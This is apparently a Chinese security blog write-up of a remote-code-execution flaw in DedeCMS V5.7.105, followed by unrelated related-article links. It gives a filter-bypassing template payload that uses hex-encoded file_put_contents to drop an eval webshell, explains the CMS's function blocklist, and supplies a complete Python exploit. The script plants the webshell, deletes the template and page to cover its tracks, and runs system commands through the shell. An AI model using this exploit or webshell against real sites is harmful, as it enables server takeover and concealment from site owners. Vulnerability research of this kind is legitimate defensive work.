前言

原文链接:https://mp.weixin.qq.com/s/bwBc4I9GeY6M_WlEDx83TA

复现记录时间:

下载当前最新版本DedeCMS V5.7.105进行漏洞复现以及漏洞分析

漏洞复现

可以自己在本地搭建漏洞环境,也可以拉取我自己制作的docker镜像

docker pull se1zer/dedecms:latest

docker run -d -P se1zer/dedecms

不会给镜像做瘦身,正在学了,555,要是拉取的太慢可以挂到后台或者就自己本地搭一下吧

首先需要到后台登录界面/uploads/dede/登录到后台,然后如下图操作创建一个模板

这里模板内容需要做绕过,详情看后边的漏洞分析

<?php

"\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"('./shell.php', "<?php eva" . "l(\$_GE" . "T[a]);");

// file_put_contents('./shell.php', "<?php eval($_GET[a]);");

第二步,如下图增加一个页面

通过刚刚新建的模板进行新建页面,需要注意的是这里文件名处后缀为.php

之后便在/uploads/a/下创建了一个文件,访问/uploads/a/123.php页面将会执行自己写的file_put_contents函数生成一个shell.php

漏洞分析

通过刚才漏洞复现的接口,可以看到创建模板调用的是tpl.php文件,新建页面调用的是templets_one_add.php文件

tpl.php

文件位于/uploads/dede/tpl.php

在31行这里,对模板内容进行了一些过滤和检测,下边使用注释进行解释过滤

// 不允许这些字符

$content = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $content);

// 黑名单正则匹配

global $cfg_disable_funs;

$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace';

$cfg_disable_funs = $cfg_disable_funs.',[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,create_function,array_map,call_user_func,call_user_func_array,array_filert';

foreach (explode(",", $cfg_disable_funs) as $value) {

    $value = str_replace(" ", "", $value);

    // [^a-z]+ 是除a-z之外的字符(在[]里不是开头的意思)

    if(!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{]#i", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

}

// 匹配<\?php头

if(preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", " {$content}") == TRUE) {

    // 这里的U为惰性匹配

    // 匹配函数变量执行,例如$a="phpinfo",则$a()就会被匹配

    if(preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

    // 就是在上一个匹配前加了一个@,防止报错

    if(preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

    // 匹配反引号`,防止命令执行

    if(preg_match("#[`][\s\S]*[`]#i", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

}

通过上述梳理,发现有很多方法是可以绕过的!

之后进入$action == 'saveedit'语句,然后写入文件,这里模板文件必须使用.htm结尾

templets_one_add.php

前边都是对新建页面内容的一些处理,不会影响模板内容引入,在43行处开始保存文件

来到uploads/include/arc.sgpage.class.phpSavaToHtml方法

然后进入uploads/include/dedetag.class.phpSaveTo方法

798行获取模板内容,如果有标签的话,还会把标签的值写入文件

至此分析完毕

总结:代码没有对新建页面的文件后缀进行检测,并且模板内容安全检测也不够完善从而导致了这个漏洞的产生

EXP

import requests

from urllib.parse import urljoin

import re

cookies = {

    "PHPSESSID": "5k3br9fh4f34so2k0k85qqg3f5"

}

headers = {

    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36",

}

s = requests.session()

s.headers.update(headers)

s.cookies.update(cookies)

def exp(url):

    # 创建恶意模板

    tpl_url = urljoin(url, "dede/tpl.php")

    ## 获取token

    params="action=newfile&acdir=default"

    r = s.get(tpl_url, params=params)

    token = re.search('"token" value="([a-z0-9]{32})"', r.text).group(1)

    # print(token)

    shell = """<?php

    "\\x66\\x69\\x6c\\x65\\x5f\\x70\\x75\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73"('./shell.php', "<?php eva" . "l(\$_POS" . "T[a]);");

    """

    data = {

        "action": "saveedit",

        "acdir": "default",

        "token": token,

        "filename": "hack.htm",

        "content": shell

    }

    r = s.post(tpl_url, data=data)

    if "成功" in r.text:

        print("成功创建模板")

    # 利用恶意模板新建页面

    templets_url = urljoin(url, "dede/templets_one_add.php")

    data = {

        "dopost": "save",

        "title": "hack",

        "keywords": "hack",

        "description": "hack",

        "likeidsel": "default",

        "nfilename": "/a/hack.php",

        "template": "{style}/hack.htm",

        "ismake": 0,

        "body": ""

    }

    r = s.post(templets_url, data=data)

    if "成功" in r.text:

        print("成功增加页面")

    s.get(urljoin(url, "a/hack.php"))

    # 清理痕迹

    ## 获取aid

    r = s.get(urljoin(url, "dede/templets_one.php"))

    aid = re.search("'templets_one_edit.php\?aid=([0-9]+)&dopost=edit'>hack", r.text).group(1)

    ## 删除页面

    params = f"aid={aid}&dopost=delete"

    r = s.get(urljoin(url, "dede/templets_one_edit.php"), params=params)

    if "成功" in r.text:

        print("成功删除页面")

    ## 删除恶意模板

    params = "action=del&acdir=default&filename=hack.htm"

    r = s.get(tpl_url, params=params)

    if "成功" in r.text:

        print("成功删除模板")

    shell_url = urljoin(url, "a/shell.php")

    print("shell地址: " + shell_url)

    print("shell密钥为a")

    r = s.post(shell_url, data={"a":"system('whoami');"})

    print("whoami命令执行结果: " + r.text)

if __name__ == "__main__":

    url = "http://phpstorm.com/DedeCMS-V5.7.105-UTF8/uploads/"

    exp(url)

登录后台后,手动修改脚本中的cookie和网站根目录,运行脚本即可获得shell地址及密码

织梦DedeCMS 0day RCE的更多相关文章

  1. 织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

    漏洞版本: Dedecms 5.5 漏洞描述: 漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认 ...

  2. 织梦Dedecms使用Nginx的安全设置

    首先需要说明的是,任何程序都是有漏洞的,我们需要做好一些必要的防范,来减少由于程序漏洞造成的损失.织梦的漏洞多,这个是很多人的想法.不过大家如果做好了织梦系统的文件夹权限什么的设置,很多漏洞也是用不上 ...

  3. 织梦DedeCMS模板防盗的四种方法

    织梦(DedeCMS)模板也是一种财富,不想自己辛辛苦苦做的模板被盗用,在互联网上出现一些和自己一模一样的网站,就需要做好模板防盗.本文是No牛收集整理自网络,不过网上的版本都没有提供 Nginx 3 ...

  4. 织梦Dedecms安全设置

    织梦DedeCMS是一款非常流行的CMS,很多刚开始建站人都用的织梦,一方面是织梦比较容易操作;另一方面是织梦的SEO方面做的确实比其他的系统要好一些.这些都导致织梦的用户群是非常庞大的,用的人多了, ...

  5. 织梦DEDECMS网站后台安全检测提示 加一个开关

    1.进入后台后,点击 系统->系统基本参数->添加变量: 变量名称:cfg_safecheck_switch 变量值:N 变量类型:布尔(Y/N) 参数说明:启用安全监测系统: 2.找到系 ...

  6. 织梦DedeCMS首页调用单页文档内容的方法

    很多使用织梦dedecms单页文档功能的朋友都想知道如何在织梦首页调用单页文档的内容,下面就教大家具体的实现方法: 具体步骤如下: 首先在首页模板需要显示单页文档内容的地方插入如下代码: {dede: ...

  7. 织梦DedeCms调用全站相关文章方法

    织梦DedeCms 有个标签可以调用相关文章,通过下面的修改可以调用全站的相关文章,文章页内显示相关文章内容,可以提高关键词密度,还是挺不错的. 模板调用代码 <div>     < ...

  8. 织梦DedeCms用SQL语句调用数据库任意内容方法

    织梦DedeCms给我们提供了大量调用标签,供我们调用各种数据,但提供再多的标签,也有满足不了我们的时候,这时我们可以用SQL语句,灵活调用我们需要的内容. 如何任意调用数据库中的内容呢?先举个例子: ...

  9. 织梦DedeCms网站更换域名后文章图片路径批量修改

    因为织梦上传图片用的是绝对地址,如果域名更换后,之前发布的文章的图片URL是不会跟着改变的,所以我们需要把旧域名替换成新的域名,方法很简单,有一段SQL语句更新一下文章正文内容就行. 复制下面SQL语 ...

  10. 织梦DedeCms去掉栏目页面包屑导航最后的分隔符“>”

    织梦DedeCms的面包屑导航调用标签{dede:field name=’position’ /},在栏目页里调用的面包屑导航,最后会出现分割符号“>”,如:主页 > DedeCms 模板 ...

随机推荐

  1. Aspose.Cells设置单元格背景色不生效

    Style.BackgroundColor property 获取或设置样式的背景颜色.public Color BackgroundColor { get; set; } 评论 如果要设置单元格的颜 ...

  2. Selenium4+Python3系列(九) - 上传文件及滚动条操作

    一.上传文件操作 上传文件是每个做自动化测试同学都会遇到,而且可以说是面试必考的问题,标准控件我们一般用send_keys()就能完成上传, 但是我们的测试网站的上传控件一般为自己封装的,用传统的上传 ...

  3. Kubernetes(K8S) 配置管理-ConfigMap 介绍

    作用:存储不加密数据到 etcd,让 Pod 以变量或者 Volume 挂载到容器中 场景:配置文件 创建配置文件 redis.properties redis.host=127.0.0.1 redi ...

  4. 【SQL基础】多表查询:子查询、连接查询(JOIN)、组合查询(UNION集合运算)

    〇.概述 1.内容 JOIN表连接(内连接INNER JOIN/JOIN)(外连接LEFT/RIGHT (OUTER) JOIN) 集合运算-UNION联合 2.建表语句 drop table if ...

  5. 【Spark】Day03-Spark SQL:DataFrame、DataSet、sql编程与转换、项目实战(区域热门商品)

    一.概述 1.介绍 将Spark SQL转换成RDD,然后提交到集群执行[对比hive] 提供2个编程抽象:DataFrame&DataSet 可以使用SQL和DatasetAPI与Spark ...

  6. 高可用系列文章之三 - NGINX 高可用实施方案

    前文链接 高可用系列文章之一 - 概述 - 东风微鸣技术博客 (ewhisper.cn) 高可用系列文章之二 - 传统分层架构技术方案 - 东风微鸣技术博客 (ewhisper.cn) 四 NGINX ...

  7. CONDITION EVALUATION DELTA热部署启动失效

    1.问题描述 我在启动一个SpringBoot项目的时候,在启动中控制台不停的打印日志(如下图所示) 2.产生原因 当时我是看了这篇文章后CONDITION EVALUATION DELTA_苦逼码农 ...

  8. PKUSC2022 润摆寄

    Day 0 模拟赛的题目竟是 寄 摆 润!预示着我的 PKUSC. Day 1 猜中主角(指九条可怜)原来都是芳文厨 看错时间以为考 \(5h\),于是告诉自己 优势在我可以慢慢做. T1 很显然的 ...

  9. Hadoop详解(02)Hadoop集群运行环境搭建

    Hadoop详解(02)Hadoop集群运行环境搭建 虚拟机环境准备 虚拟机节点数:3台 操作系统版本:CentOS-7.6-x86-1810 虚拟机 内存4G,硬盘99G IP地址分配 192.16 ...

  10. (4)go-micro微服务proto开发

    目录 一 Protobuf介绍 二 安装Protobuf 三 Protobuf语法 1.1 基本规范 1.2 字段规则 1.3 service如何定义 1.4 Message如何定义 四 proto代 ...